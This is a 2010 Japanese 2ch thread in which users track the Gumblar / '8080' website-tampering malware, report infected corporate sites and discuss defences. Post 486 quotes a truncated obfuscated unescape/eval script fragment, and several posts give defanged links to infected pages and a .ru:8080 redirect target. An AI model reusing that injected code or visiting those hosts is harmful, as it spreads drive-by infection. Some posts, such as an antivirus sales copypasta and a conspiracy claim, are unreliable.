446 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:48:09 ]: 2chスレ内だけで感染できるなら感染してみろや
447 名前：440 mailto:sage [2010/01/07(木) 11:53:28 ]: >>446
自分Live2ch使ってるんですが、そのスレ見たらAvastが検出して、その後Avastの履歴見たらLive2chが書かれていました
自分も良く分からないのですが
誤検出ですかね？
448 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:55:34 ]: どんだけー
449 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:56:30 ]: 検出と感染は違うだろ。
検出に誤検出もなにもない。
450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 11:57:01 ]: 2chでJS:Redirector-H [Trj]ならAvastの誤検出
451 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:01:26 ]: >>449
誤検出はあるだろ
452 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:02:39 ]: すまん。誤検出はあるな。検出がない。
453 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:05:02 ]: 俺初心者でこのスレ読んで思ったんだけど、2chのスレ見ただけでトロイの木馬って感染するんですか？
今話題のGumblarってのはサイトを見ただけで感染するようですが
454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:17:52 ]: 誰かここに癌ブラーのソース貼り付けてたよね
うつったかも
455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:29:08 ]: 今日は釣り日和なんか？
456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:32:44 ]: ２ちゃんに繋ぐFTPアカ持ってる人が踏んで、このページが書き変えられれば感染するんじゃね？
457 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 12:44:51 ]: 私は対策ソフトを集めてマルウェアの性能テストなどをしています。
PC雑誌の熟読には自信があります。

私の豊富なテストと経験からすればKaspersky Internet Security 2010が最もおすすめです。
2010ではBehavior BlockerやHIPSに加えて仮想実行スペースも搭載されたのでGumblar
(日本の通称ではGENOウイルス)パターンでもバッチリ防げます。
458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:47:44 ]: コピペ乙
459 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 12:48:13 ]: 経験豊富なあなたがお勧めする

　Kaspersky Internet Security 2010

これは、買わないといけないね！
460 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 13:04:10 ]: AVGは検出してくれないのか？
461 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 13:18:44 ]: 俺もAVG使ってるんだけど、どうなのか不安なんだよね
462 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 13:30:43 ]: ココで合ってる？

pc11.2ch.net/linux/ > GZ > file.htm JS/TrojanDownloader.Agent.NRL トロイの木馬
463 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 15:14:14 ]: /*GNU GPL*/とか呼びにくい
まだ名前ないのか？
464 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 15:16:54 ]: JRウイルス
465 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 16:37:20 ]: ハウス食品　『　お客様のPCにウィルスを感染させてしまったかも・・・　』
tsushima.2ch.net/test/read.cgi/news/1262843094/
>弊社の「採用ホームページ」が第三者による不正アクセスにより改ざんされ、
～
>２．対象期間
>2009年12月15日 1:00　～　2010年1月5日 15:00
ローソンと一緒か
466 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 16:53:19 ]: 他所は大変だね。
わたしのとこは絶対大丈夫！　うぇぇｗｗｗｗWw

え～と
どれどれ　

/*GNU GPL*/　・・・　(°◇°;)
467 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:17:22 ]: 何で新卒採用情報ページばかり？
偶然？
468 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:22:50 ]: 新卒ディレクトリしか入れないFTPアカ持ってるヤツが踏んだんじゃね？
469 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:23:06 ]: 時期的な事情があったりして？
470 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:25:25 ]: 家で更新してんのか
471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:31:27 ]: >>447
画像系の直リンにセキュリティソフトが反応しているｄけで
専ブラという箱庭世界内ではスレに貼られている有害リンクを直接踏んでWEBブラウザで開かない限りは
120%感染はあり得ません
janeやIE系のlive2chはもちろん、全ての2chブラウザに共通
472 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:49:02 ]: 2chブラウザに脆弱性なしということですか？
473 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:53:22 ]: いや
あったとしても利用されてない
474 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:54:46 ]: 2chのスレを見るだけなら2ch自体が感染しない限りwebブラウザでも同じ
反応するのはコードのコピペ
後は画像サムネイル機能を持った外部ページからの経由ではこれに反応するかもしれないって程度
475 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 17:55:36 ]: ここにコード貼り付けた馬鹿がいるから
476 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 19:16:49 ]: コード貼りつけたからって馬鹿とかいうなよ
リンク貼るヤツより遥かにマシ
477 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 19:21:30 ]: 比べてどうするんだよｗ
どっちも糞で馬鹿なのには違いない。
478 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 19:43:56 ]: >>467-469
某大学のHP陥落が関係していると思われ。
479 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 19:49:17 ]: 不況のあおりですか。
サイバーテロですね。
480 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 20:32:16 ]: どっかでVistaは関係ねーとかかかったらPCぶっ壊れてすぐわかるとか言われてたけど
結局どうなのこのGENOだかGumblarだか言うウィルスって
481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 20:33:00 ]: 結局誰も何も分かっていない
482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 20:34:43 ]: 無償ツールで「Gumblarウイルス」チェックを～セキュアブレインが呼びかけ
セキュアブレインの先端技術研究所の調査によれば、
2009年度第2四半期（2009年7月～9月）と
第3四半期（2009年10月～12月）を比較すると、
「Gumblarウイルス」によるWebサイトの改ざん被害の件数は、
約4倍の上昇となっている。
12月に発見された「Gumblarウイルス」によって
改ざんされたWebサイト336件のうち、127件（37.8％）の被害サイトは、
企業のWebサイトとの情報もある。
www.rbbtoday.com/news/20100107/64816.html
途中の文を切ってますがかなり増えてるみたいですね。
483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 20:38:15 ]: >>480
ガンブラーウイルスについての誤った情報にご注意ください。
ttp://blogs.yahoo.co.jp/noooo_spam/59368027.html
484 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 20:57:31 ]: 8080なんて呼んでんのはGENOスレにいるやつだけだろ
485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:02:08 ]: Ｇｕｍｂｌａｒ感染してないか確認する方法は、GENOと同じ？
486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:08:03 ]: これって新Gumblar？
tp://break24●nl/
＜/head＞＜script language=javascript＞＜!--
～中略～
POF=unescape（f5DJz）；eval（POF）｝）（/&/g）；
--＞＜/script＞
＜body＞
487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:13:49 ]: 違うと思う
488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:20:26 ]: >>486
それは豚汁
489 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:23:27 ]: >>484
あんたに聞きたい
なぜ8080と呼称するのをそこまで嫌がるの？
Gumblarと明確に違うものなのだから便宜上8080って呼んでも良いじゃないの

ってかマスコミがGumblarって名で広め過ぎてて各個人ブログもちょっと混乱気味・・・
490 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:27:15 ]: 8080なんて呼んでるやつはごく一部だけって話だろ
ポートじゃわかりにくいし勘違いするやつもいるだろうしな
491 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:29:23 ]: >>484
早く正式名称決めないとヤバイと思うよ、これ。
今回広範囲に被害が広がったのは、GENOと同じ物だと思って対策してなかった人も多いと思う。
対策方法が違うし、とりあえず8080でいいんじゃないの？
492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:32:07 ]: gumblar亜種ってことで良いだろ
くだらねえことでこだわるなよ
493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:32:08 ]: >>490
今のところ発見当初から変わってない特徴が8080ポート指定ってとこなんだから、別に問題ないと思うけど？
どんな勘違いするんだ？？
スクリプトなり仕込んでくる実行ファイルは変化してるし、「GNU GPL」は「CODE1」に変化した経歴があるし・・・
494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:34:22 ]: >>492
Gumblar直系の亜種としてGumblar.xってのがあるんだよ
そこに8080が食い込んできたからこのスレがGENOスレ発祥で出来たんだけど、マスコミがGumblarで統一しちゃったせいで
あっちのスレにも8080の改竄報告がいったりしてる
495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:34:50 ]: ru指定か？
ちがったっけ
そうならruでもいいな
ロシアンガンブラーでいいよ
496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:35:30 ]: >>494
だからなんだよ
しつけえな
くだらねえ
497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:37:51 ]: >>494
別に亜種は複数合っても良いんだよ
似たような種類だし分かりやすくて良いよ
まあ有名どころのベンダーが適当に付けた名前が定着するだろうけど
498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:40:16 ]: テンプレで8080系ってなってるだろ
嫌ならGENOスレでやってくれ
499 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:41:34 ]: 単にテンプレ作ったやつが馬鹿だからだろ
8080なんて普通に使うポート
無知なだけ
500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:43:38 ]: 8080系ってことはガンブラーの8080系って言いたいんだろ？
501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:45:16 ]: 呼び名なんて分かれば良いんだよ
世間でガンブラーらなそれで良いだろ
間違いとか言うなよ
502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:51:14 ]: ＞世間でガンブラーらなそれで良いだろ
良くないから感染が広がったんじゃないかと

Gumblar8080とかかっこよくね？
503 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:51:50 ]: 分かればGumblarでもGENOでもなんでもいいよ
でも今のこのごちゃ混ぜ状態で何が起こってるかって言ったら、8080で感染したのにGumblarってだけでGENOウイルスチェッカーが
未だに使えると思ってる奴が居たり、初代Gumblar(GENOとよく言われた奴)の感染確認方法で確認できると思ってる奴が居たり・・・

どっかベンダーが改めて名前つけてくれたら良いのに・・・ベンダー共通の名前つけよう云々ってどうなったんだ
504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 21:59:16 ]: しかし目的はなんなのかね
ウェブ改竄の被害を楽しんでるだけかな
505 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:06:36 ]: >>504
8080で詐欺紛いもやってるみたいだけどね>>424
まあコード書き換えれば感染PCをボットネット化するようなこともできるだろうし、金にしようと思えばどうにでもなるな
506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:09:16 ]: GumblarもそうだがゾンビPC化すると
DOS攻撃やらなにやらでサイバーテロも起こせるだろ？
金になるとしてもかなり危険だと思うがな
507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:10:35 ]: この手のウィルスって亜種が作りやすいだろうから、なんか切りがないよな
508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:23:06 ]: 切りがないけど、アンチウイルスソフトじゃ対応が一歩遅い気がする
ブラウザで判定できたらいいのにっておもう
509 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:28:42 ]: ブラウザで判定する意義が分からん・・・結局ウイルス対策ソフトでやってることと一緒じゃね？
そんなことより、使ってるソフトのアップデートを的確にやって既知の脆弱性を埋める&最新のウイルス対策ソフトの常駐の徹底が
一番効果的かと
510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:28:48 ]: ブラウザで判定すると早くなるのか？
そんなこと無いから同じ
511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:30:04 ]: もうJavaScript切っとけ
512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:39:26 ]: 別にJavaScript自体が悪いって訳じゃないけど、ホワイトリスト形式で使った方が賢明な状況だよね
で、この流れでNoScriptの話題に振ると、暴れる粘着が居るという・・・
まあなんだ、IEなら信頼済みサイトゾーンの有効活用、FirefoxならNoScript導入、Operaならサーバーマネージャ使うか
No More Scriptsっていうブックマークレット使うか・・・こんな書き方で良い？ｗ
513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:41:28 ]: アップデートの徹底がいいのは当然だけど、（ブラウザに定義をカスタマイズできるようにして）
jsの内容が難読処理されてたら、実行しないとか、中国ロシアのサイトに飛ばす内容は実行しないとか
ウイルスソフトの判定の前にブラウザで判定できたら、2段ガマエになって、よりいいんじゃないかと思っただけ。
ウイルスソフトに任せきりが嫌なんだよ。どこまでちゃんと見てるかわかりづらいから。
514 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:43:53 ]: ウイルスソフトに任せちゃ駄目だよねｗ
515 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:51:24 ]: アドビ製品は強制アップデートでおｋ
516 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:51:31 ]: >>513
そんな機能ブラウザに標準搭載したら、正常なサイトまで表示崩れたり、真っ白ってことになりかねんか？
外部の奴がアドオンで作るならまだ現実味があるが、ブラウザベンダー自体が付けるような機能には思えん

そこまで心配なら、真っ新な状態の仮想化環境でブラウジングがお勧め
517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 22:59:57 ]: 真っ新なマッシン
518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:04:54 ]: >>516
ブラウザベンダーがつけてこそ、そのブラウザの信用やシェアが上がったりしないかな。
まあ現実的ではないと思うけど
519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:17:43 ]: >>518
逆に否定意見が結構集まる気がするｗ
まあ最新バージョンのブラウザはどこもフィッシング対策との名目で何かしらのフィルタリング機能入ってるから、そこに期待するしかないんじゃ
ないかな
と言っても、実際改竄されてるページをブロックできてたり、対応が早いかっていうと・・・

結局は環境を常に最新に、ウイルス対策ソフトも最新に(ただし過信は禁物)ってとこに落ち着く
520 名前：名無しさん＠お腹いっぱい。 [2010/01/07(木) 23:31:10 ]: ウイルスが先かウイルスソフトが先かという命題と同じ
Web改鼠は結果でしかなくて、インターネットの開発者は皆どこかしらの違法結社に属していて
ウイルス漬けにされているという現実が露呈した格好だ
521 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:40:39 ]: なんだか楽天トラベルおかしい？
522 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:48:19 ]: アメーバがやられた
ブログパーツを使ったサイトで改ざんされたらしい
流出事件といいこのサイトはだめぽ
523 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:49:10 ]: ハスクバーナ・ゼノアのHPもGENOに感染してない？
ttp://www.zenoah.co.jp/
524 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:49:24 ]: アメバが駄目なんてずっと前から言われてるよ
525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:56:22 ]: >523
ノートン先生に怒られた
526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:56:24 ]: >>523

Kaspersky
Internet Security 2010
アクセスが禁止されました
要求されたURLのWebページを表示できません

URL:

www.zenoah.co.jp/

このWebページはウイルスに感染しています

次のウイルスが見つかりました: Trojan-Downloader.JS.Agent.ewh

情報:
23:55:06
Kaspersky Internet Security 2010
527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/07(木) 23:59:51 ]: > Trojan-Downloader.JS.Agent.ewh
いつものだね
528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:00:15 ]: だから>>1ぐらい読めよ・・・・

＊＊＊危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください＊＊＊

危険かもしれないってアドレスも含むぞ
529 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:02:42 ]: >>523
アバストﾀﾝにも怒られた
530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:09:37 ]: お前らよく平気で踏めるな。
531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:11:38 ]: だいたい仮想環境で踏んでるんだろ
アホもいるだろうけど
532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:12:40 ]: 自信があるならドンドン踏むことをオススメする、それが漢だ

自己責任だけどね
533 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:13:08 ]: 一応view-source:使ったけどそれでも怒られた
オンラインソースチェッカーがなくなったのが辛い
534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:21:05 ]: >>530

バーチャルなら余裕だべ
535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:29:20 ]: そろそろニュースでも扱われるようになってきたし
これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか
536 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:37:40 ]: しかし.ruばっかだな
537 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:38:46 ]: 別に感染してもたいしたことないしな
それほど怖くもないだろ
538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:39:27 ]: cnとruを遮断すればかなり安全になるしな
539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:41:33 ]: ならないだろうな、無関心な奴は大して気にしなさそうだしニュースで扱われても
一部の人間が騒ぐことになるだけ

mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう
540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 00:46:31 ]: サイバーエージェントとノートンの「ノートン警察」閲覧者にトロイの木馬感染のおそれ
tsushima.2ch.net/test/read.cgi/news/1262865452/ 　
541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 01:08:28 ]: >>523
/*LGPL*/
ちょっと変わってるぞ

>>529
あれ？　こっちでは反応ない
542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 01:12:26 ]: >>541
スクリプトにはどこも反応しないみたいだね
ttp://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262880649
543 名前：541 mailto:sage [2010/01/08(金) 01:22:17 ]: もう一ヶ所/*LGPL*/になっている所をみつけた
新型スクリプトみたいだな
検出できるのはノートンの侵入検知くらいかも
avast!にはスクリプトの検体を提出しておこう
544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 01:29:57 ]: >>541
えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが
545 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 01:38:45 ]: >>544
標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか？
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた
546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 01:58:14 ]: 貼られた直後に飛び先のチェックでソース見たときは/*GNU GPL*/だったような・・・
まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも
547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 02:43:36 ]: Amebaのブログパーツ「ノートン警察」閲覧者にトロイの木馬感染のおそれ
www.itmedia.co.jp/news/articles/1001/07/news092.html

12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。

　ノートン警察は、シマンテックと共同で昨年9月17日～12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。
548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 02:47:15 BE:1887326-2BP(1236)]: >>523
whois見てそこへ報告すた。
届けばいいけど。。。
549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 02:54:13 ]: Adblockのブロックリストに
|*.ru:8080/*
で今のところは大丈夫かな
550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 02:56:26 ]: >>526
aguseで調べたけど出なかったKasperskyなのに
画像取得日時　2010-01-08 02:53:28
検出されたウイルス（ワーム、スパイウエア）
ウイルス（ワーム、スパイウエア）は検出されませんでした。
551 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 02:59:42 ]: ドクター中松のサイトもやられてる
552 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:01:59 BE:2829492-2BP(1236)]: >>551
/*GNU GPL*/ だぎゃ。。。
553 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:02:03 ]: >>551
GNU GPLだね
554 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:08:37 ]: しかし凄いことになってるな
555 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:09:16 BE:11319089-2BP(1236)]: >>551
ほい、飛び先.ru:8080/pics/win.jpg
ttp://online.us.drweb.com/cache/?i=2c2639efd0815cc02072f39ffcf95712
556 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:33:03 ]: インターネットからftpでメンテできるwebサイトが多すぎなのが悪いんだろ？
うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、
HP制作会社にはVPNクライアントいれてもらってる
仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可
557 名前：名無しさん＠お腹いっぱい。 [2010/01/08(金) 03:34:32 ]: avast!のWebシールドでも反応しない新ガンブラーが登場
tsushima.2ch.net/test/read.cgi/news/1262886266/
558 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 03:38:13 ]: 今まで/*GNU GPL*/だったサイトも/*LGPL*/に変わったりするのかな？

Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感
559 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:00:05 ]: RequestPolicyでブロックしたがthelaceweb●ruだな。
560 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:14:39 ]: >>523
スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね
561 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:21:50 BE:1572252-2BP(1236)]: >>541,543
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…
562 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:22:12 ]: ドクター中松のサイトが/*LGPL*/になった・・・
563 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:25:23 BE:943632-2BP(1236)]: >>562
あちゃー
564 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:30:52 BE:2830436-2BP(1236)]: しかも呼び込み先変えてるっぽい…
565 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 04:32:34 ]: yahooやらgooやらがやられない事を祈るだけだな・・・
566 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:00:21 ]: >>562
もともと/*LGPL*/じゃなかったの？
俺は初めに見た時から/*LGPL*/だったよ？
カスペは全く反応しなかったよ
新種なの？
567 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:05:39 BE:5660249-2BP(1236)]: >>566
「/*GNU GPL*/」
ttp://megalodon.jp/2010-0108-0303-45/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr%2Enakamats%2Ecom%2F
「/*LGPL*/」
ttp://megalodon.jp/2010-0108-0426-38/www.dan.co.uk/viewsource/index.php?url=http%3A%2F%2Fdr.nakamats.com%2F
568 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:06:43 ]: >>566
www.virustotal.com/jp/analisis/6fa28b2165d271842128a6936c19935674b51ad249d0da8aff224779eeee6bb6-1262894686
どこも検出しない
569 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:08:03 ]: >>566
>>551-553
自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな
570 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:10:54 BE:2830829-2BP(1236)]: >>569
一応>>567の下にはいつものはあったお
ttp://online.us.drweb.com/cache/?i=59056904c3c444d85f8c5779dfff2c11
571 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:12:44 ]: 検出逃れのために数時間の間に書き換えが行われているってこと？
572 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:13:32 ]: >>571
えぐざくとりぃ
多分…
573 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:14:10 ]: 春先のGENO騒動（同人祭り）に比べてスレ伸びが鈍いのが気になる…大手企業も続々やられてるというのに。
adobe系更新でokだからか？
一般ユーザには実害が無いからか？
春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか？
この手の騒動に飽きたのか？
574 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:14:15 ]: それじゃソフト入れて対策コピペの奴全部実行して対処しても意味ねーじゃん（'A`）
575 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:17:09 BE:1572252-2BP(1236)]: >>573
> 同人祭り
学習したんじゃないかな。。。

>>574
頻繁に更新があるウイルスもあったのでにゃー
576 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:18:01 ]: >>573
GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い
577 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:22:20 BE:3773838-2BP(1236)]: >>576
にゃるほど。
初期のものはそーだったのか。
578 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:22:53 ]: >>573
・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574
発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし
579 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:27:00 ]: >>576
Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね？
ちなみに初代Gumblarも復活の兆しありとか
580 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:27:27 ]: >>573
前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね
581 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:30:36 ]: >>579
そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ
582 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:30:40 ]: >>578
水面下で拡大して後々めんどくさい事になるのが怖いんだが…。
583 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:33:32 ]: 結局、8080系に引っかかった奴らって>>580が答えなの？
あんだけ騒がれてたのにアップデートもしてなかったの？
584 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:34:11 ]: 同人系でも古参が多かったり旬で活発なジャンルは今でもGENOの注意書き残してるとこ多いからなぁ
若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが
585 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/08(金) 05:34:12 ]: コメント行が書き換えられただけで検出できないって・・
